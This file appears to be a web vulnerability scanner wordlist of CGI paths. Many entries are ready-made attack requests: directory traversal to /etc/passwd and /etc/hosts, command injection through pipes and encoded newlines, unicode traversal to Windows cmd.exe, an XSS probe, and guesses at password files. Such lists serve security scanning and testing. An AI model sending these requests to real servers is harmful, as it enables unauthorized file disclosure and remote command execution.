cgi-bin/a1stats/a1disp.cgi?|/bin/ls|
cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/hosts
cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/hosts
cgi-bin/access
cgi-bin/access0
cgi-bin/access1
cgi-bin/access2
cgi-bin/access3
cgi-bin/access4
cgi-bin/access5
cgi-bin/access6
cgi-bin/access7
cgi-bin/access8
cgi-bin/access9
cgi-bin/acctman
cgi-bin/active_users
cgi-bin/ad.cgi?file=../../../../../../../../etc/hosts
cgi-bin/adcycle
cgi-bin/admin
cgi-bin/admin/admin
cgi-bin/admin/db/htpasswd
cgi-bin/adp
cgi-bin/af.cgi?_browser_out=|/bin/ls|
cgi-bin/aglimpse
cgi-bin/alibaba.pl/|dir
cgi-bin/alibaba.pl/dir
cgi-bin/allmanage/adp
cgi-bin/allmanage/k
cgi-bin/am
cgi-bin/am/codes
cgi-bin/am/codes/admin/db/htpasswd
cgi-bin/am/codes/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
cgi-bin/am/codes/ana-bin/sitehtpass/heathersplace.com/htpass-members
cgi-bin/am/codes/cgi-bin/am/codes/htpasswd
cgi-bin/am/codes/cgi-bin/database/passwords
cgi-bin/am/codes/cgi-bin/fratboys/passwords
cgi-bin/am/codes/cgi-bin/ib/data/htpasswd
cgi-bin/am/codes/cgibin/mastergate/passwords
cgi-bin/am/codes/cgi-bin/mastergate/passwords
cgi-bin/am/codes/cgibin/passwords
cgi-bin/am/codes/cgi-bin/passwords
cgi-bin/am/codes/control/member_htpasswd
cgi-bin/am/codes/data/passwdfile
cgi-bin/am/codes/htpasswd
cgi-bin/ampro
cgibin/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
cgi-bin/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
cgibin/ana-bin/sitehtpass/heathersplace.com/htpass-members
cgi-bin/ana-bin/sitehtpass/heathersplace.com/htpass-members
cgi-bin/anacondaclip.pl?template=../../../../../../../../../../../../../etc/passwd
cgi-bin/anacondaclip.pl?template=../../../../../../../../../../../../etc/hosts
cgi-bin/AnForm2
cgi-bin/ans.pl?p=../../../../bin/ls|&blah
cgi-bin/anyform
cgi-bin/AnyForm
cgi-bin/anyform2
cgi-bin/AnyForm2
cgi-bin/archie
cgi-bin/ash
cgi-bin/ats
cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/hosts
cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/passwd
cgi-bin/authorize
cgi-bin/authorize/dbmfiles/users
cgi-bin/authorizenet.cgi
cgi-bin/bash
cgi-bin/bb-dnbd
cgi-bin/bb-hist.sh?HISTFILE=../../../../../../etc/hosts
cgi-bin/bb-hist.sh?HISTFILE=/home/*
cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/hosts
cgi-bin/bb-hostsvc.sh?hostsvc=/../../../../../../../../etc/passwd
cgi-bin/bbs
cgi-bin/blabla?%0a/bin/cat%20/etc/passwd
cgi-bin/bnbform
cgi-bin/board/db
cgi-bin/Board/db
cgi-bin/buy.storefront/3baecb4a00025ad227a4c30e95010642/winnt/cmd.exe?/c+dir
cgi-bin/c32web.exe/checkerror?error=53
cgi-bin/c32web.exe/CheckError?error=53
cgi-bin/c32web.exe/showadmindir
cgi-bin/c32web.exe/ShowAdminDir
cgi-bin/cached_feed.cgi/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/motd^/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/motd
cgi-bin/cached_feed.cgi?../../../.+/etc/hosts
cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/hosts%00
cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/passwd%00
cgi-bin/calendar
cgi-bin/campas
cgi-bin/campas/etc/passwd
cgibin/campas?%0a/bin/cat%0a/etc/passwd
cgi-bin/campas?%0a/bin/cat%0a/etc/passwd
cgi-bin/campas?%0acat%0a/etc/passwd%0a
cgi-bin/carbodll
cgi-bin/cart32.exe/error
cgi-bin/cart32.exe/expdate
cgi-bin/cat
cgi-bin/ccbill
cgi-bin/ccbill/htusers
cgi-bin/ccc.exe?/c+dir
cgi-bin/ceilidh.exe/ceilidh/?n4
cgibin/cgi-bin
cgi-bin/cgibin
cgi-bin/cgi-bin
cgibin/cgi-bin/am/codes/htpasswd
cgi-bin/cgi-bin/am/codes/htpasswd
cgibin/cgi-bin/database/passwords
cgi-bin/cgi-bin/database/passwords
cgibin/cgi-bin/fratboys/passwords
cgi-bin/cgi-bin/fratboys/passwords
cgibin/cgi-bin/ib/data/htpasswd
cgi-bin/cgi-bin/ib/data/htpasswd
cgibin/cgi-bin/mastergate/passwords
cgi-bin/cgi-bin/mastergate/passwords
cgibin/cgi-bin/passwords
cgi-bin/cgibin/passwords
cgi-bin/cgi-bin/passwords
cgibin/cgi-bin2
cgi-bin/cgi-bin2
cgi-bin/cgiforum.cgi?thesection=../../../../../../etc/hosts%00
cgi-bin/cgiforum.pl?thesection=../../../../../../etc/hosts%00
cgi-bin/cgiforum.pl?thesection=../../../../../../etc/passwd%00
cgi-bin/cgiwrap
cgi-bin/cgiwrap/%3cs%3e
cgi-bin/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir
cgi-bin/classifieds
cgi-bin/cmd.exe?/c+dir
cgi-bin/cmd32.exe?/c+dir
cgi-bin/codes
cgi-bin/codes/htpasswd
cgi-bin/cohfmembers
cgi-bin/content_areas
cgi-bin/control
cgi-bin/control/member_htpasswd
cgi-bin/cookmail
cgi-bin/cookmail/cookmail
cgi-bin/core
cgi-bin/counterbanner
cgi-bin/counterbanner-ord
cgi-bin/counterfiglet
cgi-bin/counterfiglet/nc/f
cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id
cgi-bin/counterfiglet-ord
cgi-bin/counter-ord
cgi-bin/csh
cgi-bin/CSMailto.cgi?form-attachment=/bin/ls|&command=mailform
cgi-bin/CSMailto/CSMailto.cgi?form-attachment=/bin/ls|&command=mailform
cgi-bin/csvform.pl?file=/bin/ls%00|
cgi-bin/cum
cgi-bin/cwb-bin
cgi-bin/cwb-data/data
cgi-bin/data
cgi-bin/data/nicks
cgi-bin/data/passwdfile
cgi-bin/database
cgi-bin/database/admin/db/htpasswd
cgi-bin/database/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
cgi-bin/database/ana-bin/sitehtpass/heathersplace.com/htpass-members
cgi-bin/database/cgi-bin/am/codes/htpasswd
cgi-bin/database/cgi-bin/database/passwords
cgi-bin/database/cgi-bin/fratboys/passwords
cgi-bin/database/cgi-bin/ib/data/htpasswd
cgi-bin/database/cgibin/mastergate/passwords
cgi-bin/database/cgi-bin/mastergate/passwords
cgi-bin/database/cgibin/passwords
cgi-bin/database/cgi-bin/passwords
cgi-bin/database/control/member_htpasswd
cgi-bin/database/data/passwdfile
cgi-bin/database/passwords
cgi-bin/date
cgi-bin/day5notifier
cgi-bin/db
cgi-bin/db2www/library/document.d2w/show
cgi-bin/db4web_c/dbdirname/etc/hosts
cgi-bin/dbmpasswd
cgi-bin/dcforum/dcboard.cgi?az=list&file=/etc/passwd%00
cgi-bin/directorypro.cgi?want=showcat&show=../../../../etc/hosts%00
cgi-bin/directorypro.cgi?want=showcat&show=../../../../etc/passwd%00
cgi-bin/directorypro.cgi?want=showcat&show=../../../..etc/hosts%00
cgi-bin/directorypro.cgi?want=showcat&show=../../../..etc/passwd%00
cgi-bin/dmr
cgi-bin/dmr/htusers
cgi-bin/dnewsweb
cgi-bin/donothing
cgi-bin/dumpenv
cgibin/dyx-pv
cgi-bin/dyx-pv
cgi-bin/echo
cgi-bin/echo2
cgi-bin/ecommerce
cgi-bin/ecommerce/passwords
cgi-bin/eden
cgi-bin/empower?DB=mungowitsch
cgi-bin/empower?db=ukrteamhole
cgi-bin/empower?DB=UkRteamHole
cgi-bin/epoch
cgi-bin/epoch/htusers
cgi-bin/epochp
cgi-bin/epochp/htusers
cgi-bin/epwd
cgi-bin/etc
cgi-bin/etc/passwd
cgi-bin/ews
cgi-bin/excite
cgi-bin/ezmlm-cgi
cgi-bin/ezshopper2/loadpage.cgi?id+
cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=
cgi-bin/faxsurvey
cgi-bin/faxsurvey/bin/etc/passwdd
cgibin/faxsurvey?/bin/cat%20/etc/passwd
cgi-bin/faxsurvey?/bin/ls%20-a
cgi-bin/fi
cgi-bin/fi?/etc/passwd
cgi-bin/filemail
cgi-bin/finger
cgi-bin/finger.cgi?action=archives&cmd=specific&&filename=99.10.28.15.23.username.|/bin/ls|
cgi-bin/finger?@localhost
cgi-bin/flexform
cgi-bin/fom/fom.cgi?cmd=<script>alert(x)</script>&file=1&keywords=x
cgi-bin/forma
cgi-bin/formmail
cgi-bin/fortune
cgi-bin/fratboys
cgi-bin/fratboys/admin/db/htpasswd
cgi-bin/fratboys/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
cgi-bin/fratboys/ana-bin/sitehtpass/heathersplace.com/htpass-members
cgi-bin/fratboys/cgi-bin/am/codes/htpasswd
cgi-bin/fratboys/cgi-bin/database/passwords
cgi-bin/fratboys/cgi-bin/fratboys/passwords
cgi-bin/fratboys/cgi-bin/ib/data/htpasswd
cgi-bin/fratboys/cgi-bin/mastergate/passwords
cgi-bin/fratboys/cgibin/passwords
cgi-bin/fratboys/cgi-bin/passwords
cgi-bin/fratboys/control/member_htpasswd
cgi-bin/fratboys/data/passwdfile
cgi-bin/fratboys/passwords
cgi-bin/ftp/ftp.pl?dir=../../../../../../etc
cgi-bin/garden
cgi-bin/gateway
cgi-bin/get32.exe/|dir
cgi-bin/get32.exe/dir
cgi-bin/gh345dfg
cgi-bin/glimpse
cgi-bin/guestbook
cgi-bin/gw5
cgi-bin/GW5
cgi-bin/GW5/GWWEB.EXE?HELP=../../../../../index
cgi-bin/handler
cgi-bin/handler/useless_shit;cat/t/etc/passwd|
cgibin/handler/useless_shit;cat/t/etc/passwd|?data=download
cgi-bin/handler/useless_shit;cat/t/etc/passwd|?data=download
cgi-bin/hidden
cgi-bin/hsx.cgi?show=../../../../../../../etc/hosts%00
cgi-bin/hsx.cgi?show=../../../../../../etc/passwd%00
cgi-bin/htdata
cgi-bin/htdate
cgi-bin/htdocs
cgi-bin/htgrep
cgibin/htgrep/file=index.asp&hdr=/etc/passwd
cgi-bin/htgrep/file=index.asp&hdr=/etc/passwd
cgibin/htgrep/file=index.aspx&hdr=/etc/passwd
cgi-bin/htgrep/file=index.aspx&hdr=/etc/passwd
cgibin/htgrep/file=index.html&hdr=/etc/hosts
cgi-bin/htgrep/file=index.html&hdr=/etc/hosts
cgibin/htgrep/file=index.html&hdr=/etc/passwd
cgi-bin/htgrep/file=index.html&hdr=/etc/passwd
cgibin/htgrep/file=index.jsp&hdr=/etc/passwd
cgi-bin/htgrep/file=index.jsp&hdr=/etc/passwd
cgibin/htgrep/file=index.php&hdr=/etc/passwd
cgi-bin/htgrep/file=index.php&hdr=/etc/passwd
cgi-bin/html_page?TEMPLATE=main
cgi-bin/htmldocs
cgi-bin/htmlscript
cgi-bin/htmlscript/etc/passwd
cgi-bin/htmlscript?../../../../../../etc/passwd
cgibin/htmlscript?../../../../etc/passwd
cgi-bin/htmlscript?../../../../etc/passwd
cgi-bin/htpasswd
cgi-bin/htpasswd2
cgi-bin/htsearch
cgi-bin/htsearch?-c/etc/passwd
cgi-bin/htsearch?config=aaa
cgi-bin/htsearch?exclude=%60%60
cgi-bin/htusers
cgi-bin/hwtestio
cgi-bin/ib
cgi-bin/ib/data
cgi-bin/ib/data/admin/db/htpasswd
cgi-bin/ib/data/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
cgi-bin/ib/data/ana-bin/sitehtpass/heathersplace.com/htpass-members
cgi-bin/ib/data/cgi-bin/am/codes/htpasswd
cgi-bin/ib/data/cgi-bin/database/passwords
cgi-bin/ib/data/cgi-bin/fratboys/passwords
cgi-bin/ib/data/cgi-bin/ib/data/htpasswd
cgi-bin/ib/data/cgibin/mastergate/passwords
cgi-bin/ib/data/cgi-bin/mastergate/passwords
cgi-bin/ib/data/cgibin/passwords
cgi-bin/ib/data/cgi-bin/passwords
cgi-bin/ib/data/control/member_htpasswd
cgi-bin/ib/data/data/passwdfile
cgi-bin/ib/data/htpasswd
cgi-bin/ib/htpasswd
cgi-bin/ibill
cgi-bin/ibll
cgibin/ibp/search.cgi
cgi-bin/ibp5
cgibin/ibp5/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
cgibin/ibp5/ana-bin/sitehtpass/heathersplace.com/htpass-members
cgibin/ibp5/cgi-bin/am/codes/htpasswd
cgibin/ibp5/cgi-bin/database/passwords
cgibin/ibp5/cgi-bin/fratboys/passwords
cgibin/ibp5/cgi-bin/ib/data/htpasswd
cgibin/ibp5/cgi-bin/mastergate/passwords
cgibin/ibp5/cgi-bin/passwords
cgi-bin/icat
cgi-bin/iconboard/register.cgi?SEND_MAIL=/bin/ls
cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/hosts%00
cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/passwd%00
cgi-bin/imagemap
cgi-bin/info
cgi-bin/info2html
cgi-bin/info2www
cgi-bin/info2www?(../../../../../../../bin/mail
cgi-bin/infogate
cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id
cgi-bin/ion-p?page=../../../../../etc/hosts
cgi-bin/jj
cgi-bin/jj?pwd=SDGROCKS&pop=0&name=rudi&adr=elder4&phone=4523534~/bin/ls
cgi-bin/k
cgi-bin/ksh
cgi-bin/lascns
cgi-bin/lavsan
cgi-bin/live
cgi-bin/log
cgi-bin/log/mastergate
cgi-bin/login{ext}
cgi-bin/logs
cgi-bin/logs/ccserv
cgi-bin/logs/mastergate
cgi-bin/ls
cgi-bin/lwgate
cgi-bin/LWGate
cgi-bin/machineinfo
cgi-bin/MachineInfo
cgi-bin/mail
cgi-bin/mailman/mailmanager.pl?setupfile=demo&page=|/bin/ls|
cgi-bin/mailmanager.pl?setupfile=demo&page=|/bin/ls|
cgi-bin/mailto?MailTo=riotnation@hotmail.com&text=tst&EmailForm=/cgi-bin/mailto
cgi-bin/mailto?MailTo=swoopme@hotmail.com&text=tst&EmailForm=/cgi-bin/mailto
cgi-bin/malmembers
cgi-bin/man.cgi/usr/include;IFS=G;lsG-alsi;|
cgi-bin/marines
cgi-bin/master
cgi-bin/mastergate
cgi-bin/mastergate/admin/db/htpasswd
cgibin/mastergate/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
cgi-bin/mastergate/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
cgibin/mastergate/ana-bin/sitehtpass/heathersplace.com/htpass-members
cgi-bin/mastergate/ana-bin/sitehtpass/heathersplace.com/htpass-members
cgibin/mastergate/cgi-bin/am/codes/htpasswd
cgi-bin/mastergate/cgi-bin/am/codes/htpasswd
cgibin/mastergate/cgi-bin/database/passwords
cgi-bin/mastergate/cgi-bin/database/passwords
cgibin/mastergate/cgi-bin/fratboys/passwords
cgi-bin/mastergate/cgi-bin/fratboys/passwords
cgibin/mastergate/cgi-bin/ib/data/htpasswd
cgi-bin/mastergate/cgi-bin/ib/data/htpasswd
cgibin/mastergate/cgi-bin/mastergate/passwords
cgi-bin/mastergate/cgi-bin/mastergate/passwords
cgibin/mastergate/cgi-bin/passwords
cgi-bin/mastergate/cgibin/passwords
cgi-bin/mastergate/cgi-bin/passwords
cgi-bin/mastergate/data/passwdfile
cgi-bin/mastergate/htusers
cgi-bin/mastergate/passwords
cgi-bin/mastergate/passwords-bak
cgi-bin/mastergate/search.cgi
cgi-bin/megvie
cgi-bin/memb714
cgi-bin/member
cgi-bin/member_htpasswd
cgi-bin/memberpro
cgi-bin/members
cgibin/members/htdata/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
cgibin/members/htdata/ana-bin/sitehtpass/heathersplace.com/htpass-members
cgibin/members/htdata/cgi-bin/am/codes/htpasswd
cgibin/members/htdata/cgi-bin/database/passwords
cgibin/members/htdata/cgi-bin/fratboys/passwords
cgibin/members/htdata/cgi-bin/ib/data/htpasswd
cgibin/members/htdata/cgi-bin/mastergate/passwords
cgibin/members/htdata/cgi-bin/passwords
cgi-bin/messaging
cgi-bin/meter
cgi-bin/mgrqcgi?APPNAME=&PRGNAME=200As&ARGUMENTS=&PageID=&mgaction=&H_ShopID=&H_SID=&H_WID=&H_INF=
cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/hosts
cgi-bin/msbill
cgi-bin/mtc/search.cgi
cgi-bin/multihtml.pl?multi=/etc/hosts%00html
cgi-bin/ncommerce/ExecMacro/orderdspc.d2w/report?
cgi-bin/ncommerce3/execmacro/macro.d2w/noexistinghtmlblock
cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?
cgi-bin/netauth.cgi?cmd=show&page=../..
cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd
cgi-bin/netbilling
cgi-bin/netbilling/htusers
cgi-bin/netstat
cgi-bin/newoordir
cgi-bin/newsdesk.cgi?t=../../../../../../etc/passwd
cgi-bin/newspass
cgi-bin/nph-publish
cgi-bin/nph-test-cgi
cgi-bin/online
cgi-bin/oor
cgi-bin/oordir
cgi-bin/p1
cgi-bin/pagelog.cgi?display=../../../../tmp/a
cgi-bin/pagelog.cgi?name=../../../../../tmp/blah
cgi-bin/pals-cgi
cgi-bin/pals-cgi?palsaction=restart&documentname=/etc/passwd
cgi-bin/pals-cgi?palsAction=restart&documentName=pals-cgi
cgi-bin/paramtool
cgi-bin/pass
cgi-bin/passcfg
cgi-bin/passmw
cgi-bin/passwd
cgi-bin/passwd/admin/db/htpasswd
cgi-bin/passwd/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
cgi-bin/passwd/ana-bin/sitehtpass/heathersplace.com/htpass-members
cgi-bin/passwd/cgi-bin/am/codes/htpasswd
cgi-bin/passwd/cgi-bin/database/passwords
cgi-bin/passwd/cgi-bin/fratboys/passwords
cgi-bin/passwd/cgi-bin/ib/data/htpasswd
cgi-bin/passwd/cgi-bin/mastergate/passwords
cgi-bin/passwd/cgibin/passwords
cgi-bin/passwd/cgi-bin/passwords
cgi-bin/passwd/data/passwdfile
cgi-bin/passwdfile
cgi-bin/password
cgi-bin/passwords
cgi-bin/passworld
cgi-bin/per
cgi-bin/perl
cgi-bin/pfdisplay
cgibin/pfdisplay.cgi?/../../../../etc/passwd
cgi-bin/phf
cgi-bin/phf*
cgi-bin/phf?%0a
cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
cgibin/phf?qname=root%0acat%20/etc/passwd
cgi-bin/php
cgi-bin/php.cgi/etc/passwd
cgibin/php.cgi?/etc/passwd
cgi-bin/php.cgi?/etc/passwd
cgi-bin/php-cgi
cgi-bin/phpscan
cgi-bin/pi?page=document/show_file&id=
cgi-bin/pi?page=document/show_file&id=aaaaaaaaaa
cgi-bin/pics
cgi-bin/plusmail
cgi-bin/pollit/poll_it_ssi_v2.0.cgi?data_dir=/bin/ls%00
cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/bin/ls%00
cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/bin/ls%00^/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/bin/ls%00
cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/hosts%00
cgi-bin/pollit/poll_it_ssi_v2.0.cgi?data_dir=/etc/passwd%00
cgi-bin/pollit/Poll_It_v2.0.cgi?data_dir=/etc/hosts%00
cgi-bin/post_query
cgi-bin/postform?h_mailto=riotnation%40hotmail.com&h_reply-file=../../../../../../../etc/hosts
cgi-bin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=../../../../../../../etc/hosts
cgi-bin/post-query
cgi-bin/post-query?
cgi-bin/post-query^/cgi-bin/post-query
cgi-bin/printenv
cgi-bin/private
cgi-bin/privates
cgi-bin/protected
cgi-bin/protectit
cgi-bin/query
cgi-bin/query%3f
cgi-bin/reactor
cgi-bin/redirect
cgi-bin/responder
cgi-bin/restricted
cgi-bin/rksh
cgi-bin/rmp_query
cgi-bin/root.exe?/c+dir
cgi-bin/rpm_query
cgi-bin/rsh
cgi-bin/rwcgi60
cgi-bin/rwcgi60/showenv
cgi-bin/rwcgi60?test&report=
cgi-bin/s97_cgi
cgi-bin/sawmill
cgi-bin/sawmill5
cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
cgibin/search.cgi
cgi-bin/search.pl?form=/etc/passwd%00
cgi-bin/search/hsx.cgi?show=../../../../../../../etc/passwd%00
cgi-bin/search/search.cgi?keys=*&prc=any&category=../../../../../../../../etc
cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../etc
cgi-bin/secure
cgi-bin/sendpage.pl?message=test"";/bin/ls;echo%20""message
cgi-bin/sendpage.pl?message=test;/bin/ls;echo%20message
cgi-bin/sendtemp.pl?templ=../../etc/passwd
cgi-bin/session/adminlogin
cgi-bin/sh
cgi-bin/shop.cgi/page=../../../../../../etc/passwd
cgi-bin/shop.cgi/page=../../../../etc/hosts
cgi-bin/shopper.cgi?newpage=../../../../../../../../../etc/hosts
cgi-bin/shopper.cgi?newpage=../../../../../../etc/passwd
cgi-bin/shopplus.cgi?dn=domainname.com&cartid=%cartid%&file=;cat%20/etc/passwd|
cgi-bin/showfile
cgi-bin/simple
cgi-bin/simple/config/menu
cgi-bin/simple/view_page.html?mv_arg=|/bin/ls|
cgi-bin/sojourn
cgi-bin/sojourn.cgi?cat=../../../../../../etc/passwd%00
cgi-bin/ssi
cgi-bin/ssi%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
cgi-bin/ssi../../../../../../../../../etc/hosts
cgi-bin/ssi../../../../../../../../../etc/passwd
cgi-bin/ssi/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
cgi-bin/ssi/../../../../../../../../../etc/hosts
cgi-bin/ssi/../../../../../../../../../etc/passwd
cgi-bin/ssi/cgi-bin/ssi
cgi-bin/staff/inches
cgi-bin/statsconfig
cgi-bin/store.cgi?StartID=../../../../../../../etc/hosts%00
cgi-bin/suche/hsx.cgi?show=../../../../../../../etc/hosts%00
cgi-bin/survey
cgi-bin/System/Userlogin{ext}
cgi-bin/talkback.cgi?article=.../../../../../../../../etc/passwd%00&action=view&matchview=1
cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
cgi-bin/tcsh
cgi-bin/technote/print.cgi?board=../../../../../../../../etc/passwd%00
cgi-bin/temp
cgi-bin/test.txt;%20/bin/ls
cgi-bin/testcgi
cgi-bin/test-cgi
cgi-bin/test-cgi/*
cgi-bin/test-cgi/bin/etc/passwd
cgi-bin/test-cgi?*
cgibin/test-cgi?/help&0a/bin/cat%20/etc/passwd
cgi-bin/test-cgi?/help&0a/bin/cat%20/etc/passwd
cgi-bin/test-env
cgi-bin/texis.exe/ngohos
cgi-bin/texis/hoschiboschi
cgi-bin/textcounter.pl?/;IFS=/8;(ps
cgi-bin/tmp
cgi-bin/tpgnrock
cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/hosts
cgi-bin/tst.bat/|dir
cgi-bin/tst.bat/dir
cgi-bin/ttawebtop.cgi/?action=start&pg=
cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd
cgi-bin/udirectory.pl?main_field=blah&command=add_new_listing&category_file=/../../../../../../../bin/id
cgi-bin/uncgi
cgi-bin/uptime
cgi-bin/userdb
cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../etc/passwd
cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../bin/ls
cgi-bin/v2p22
cgi-bin/view_source
cgibin/view-source
cgi-bin/view-source
cgi-bin/view-source/etc/passwd
cgibin/view-source?../../../../../../../etc/passwd
cgi-bin/view-source?../../../../../../../etc/passwd
cgi-bin/viewsrc.cgi?loc=../../../../../../../../etc/hosts
cgi-bin/w2-msql
cgi-bin/w3-msql
cgi-bin/w3-sql
cgi-bin/w3tvarspm
cgi-bin/wais.pl/set%20Gopher=/bin/cat%20/etc/passwd
cgi-bin/web_store/web_store.cgi?page=../../../../../../../etc/passwd%00ext
cgi-bin/web2000
cgi-bin/web800
cgi-bin/web900
cgi-bin/webbin
cgi-bin/webboard/generate.cgi?content=../../../../../../../../../etc/hosts%00&board=tst
cgi-bin/webc.cgi/g
cgi-bin/webcash
cgi-bin/webcash/htusers
cgi-bin/webdriver
cgi-bin/webgais
cgi-bin/webplus
cgi-bin/webplus?script=
cgi-bin/webplus?script=/../../../../etc/passwd
cgi-bin/websendmail
cgi-bin/webshell
cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/hosts
cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwd
cgi-bin/whois_raw.cgi/etc/passwd
cgibin/whois_raw.cgi?fqdn=%0acat%20/etc/passwd
cgi-bin/whois_raw.cgi?fqdn=%0acat%20/etc/passwd
cgi-bin/windmail.exe?%20|%20dir%20c:
cgi-bin/work
cgi-bin/wrap
cgi-bin/wwwboard
cgi-bin/wwwjoin
cgi-bin/wwwjoin/htusers
cgi-bin/www-sql
cgi-bin/wwwthreads
cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../etc/hosts%00
cgi-bin/yabb.pl?board=news&action=display&num=../../../../../../../../etc/passwd%00
cgi-bin/z9v8..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
cgi-bin/z9v8..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir
cgi-bin/zml.cgi?file=../../../../../../../../../etc/hosts%00
cgi-bin/zsh
cgi-bin2
cgi-bin2/_privat
cgi-bin2/_vti_pvt
cgi-bin2/~rollo
cgi-bin2/~root
cgi-bin2/access
cgi-bin2/access0
cgi-bin2/access1
cgi-bin2/access2
cgi-bin2/access3
cgi-bin2/access4
cgi-bin2/access5
cgi-bin2/access6
cgi-bin2/access7
cgi-bin2/access8
cgi-bin2/access9
cgi-bin2/acctman
cgi-bin2/active_users
cgi-bin2/admin
cgi-bin2/am
cgi-bin2/ampro
cgi-bin2/ampro/info
cgi-bin2/ampro/info/admin/db/htpasswd
cgi-bin2/ampro/info/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
cgi-bin2/ampro/info/ana-bin/sitehtpass/heathersplace.com/htpass-members
cgi-bin2/ampro/info/cgi-bin/am/codes/htpasswd
cgi-bin2/ampro/info/cgi-bin/database/passwords
cgi-bin2/ampro/info/cgi-bin/fratboys/passwords
cgi-bin2/ampro/info/cgi-bin/ib/data/htpasswd
cgi-bin2/ampro/info/cgibin/mastergate/passwords
cgi-bin2/ampro/info/cgi-bin/mastergate/passwords
cgi-bin2/ampro/info/cgibin/passwords
cgi-bin2/ampro/info/cgi-bin/passwords
cgi-bin2/ampro/info/control/member_htpasswd
cgi-bin2/ampro/info/data/passwdfile
cgi-bin2/ats
cgi-bin2/authorize
cgi-bin2/ccbill
cgi-bin2/cgibin
cgi-bin2/cgi-bin
cgi-bin2/cgi-bin2
cgi-bin2/codes
cgi-bin2/cohfmembers
cgi-bin2/content_areas
cgi-bin2/control
cgi-bin2/cum
cgi-bin2/data
cgi-bin2/database
cgi-bin2/date
cgi-bin2/db
cgi-bin2/dbmpasswd
cgi-bin2/dmr
cgi-bin2/dyx-pv
cgi-bin2/eden
cgi-bin2/epoch
cgi-bin2/epochp
cgi-bin2/epwd
cgi-bin2/etc
cgi-bin2/fratboys
cgi-bin2/garden
cgi-bin2/gateway
cgi-bin2/gh345dfg
cgi-bin2/hidden
cgi-bin2/htdata
cgi-bin2/htdate
cgi-bin2/htpasswd
cgi-bin2/ib
cgi-bin2/ibll
cgi-bin2/ibp5
cgi-bin2/info
cgi-bin2/live
cgi-bin2/log
cgi-bin2/logs
cgi-bin2/malmembers
cgi-bin2/marines
cgi-bin2/master
cgi-bin2/mastergate
cgi-bin2/memb714
cgi-bin2/member
cgi-bin2/member_htpasswd
cgi-bin2/memberpro
cgi-bin2/members
cgi-bin2/meter
cgi-bin2/msbill
cgi-bin2/netbilling
cgi-bin2/newoordir
cgi-bin2/newspass
cgi-bin2/online
cgi-bin2/oor
cgi-bin2/oordir
cgi-bin2/p1
cgi-bin2/pass
cgi-bin2/passmw
cgi-bin2/passwd
cgi-bin2/passwdfile
cgi-bin2/password
cgi-bin2/passwords
cgi-bin2/passworld
cgi-bin2/pics
cgi-bin2/private
cgi-bin2/privates
cgi-bin2/protected
cgi-bin2/protectit
cgi-bin2/reactor
cgi-bin2/restricted
cgi-bin2/secure
cgi-bin2/userdb
cgi-bin2/v2p22
cgi-bin2/web2000
cgi-bin2/web800
cgi-bin2/web900
cgi-bin2/webbin
cgi-bin2/webcash
cgi-bin2/work
cgi-bin-sdb
cgi-dos
cgi-home
cgi-local
cgi-local/shop.pl/SID=947626980.19094/page=;ls|
cgi-script/CSMailto/CSMailto.cgi?form-attachment=/bin/ls|&command=mailform
cgi-shl
cgi-shop/view_item.pl?HTML_FILE=../../../../../../etc/hosts%00&KEY=1900-0999
cgi-shop/view_item?HTML_FILE=../../../../../../etc/hosts%00&KEY=1900-0999
cgi-src
cgi-sys
cgi-win
cgi-win/aglimpse
cgi-win/AnyForm2
cgi-win/campas
